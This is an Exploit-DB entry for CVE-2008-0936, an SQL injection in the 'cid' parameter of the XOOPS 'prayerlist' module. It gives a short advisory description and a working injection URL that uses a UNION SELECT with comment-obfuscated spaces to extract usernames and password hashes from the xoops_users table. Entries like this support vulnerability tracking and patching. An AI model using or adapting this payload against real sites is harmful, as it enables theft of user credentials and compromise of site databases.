XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection Vulnerability

2008-02-21T00:00:00
ID EDB-ID:31284
Type exploitdb
Reporter S@BUN
Modified 2008-02-21T00:00:00

Description

XOOPS 'prayerlist' Module 'cid' Parameter SQL Injection Vulnerability. CVE-2008-0936. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/27934/info

XOOPS 'prayerlist' module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/modules/prayerlist/index.php?pa=view&cid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass)/**/from/**/xoops_users/*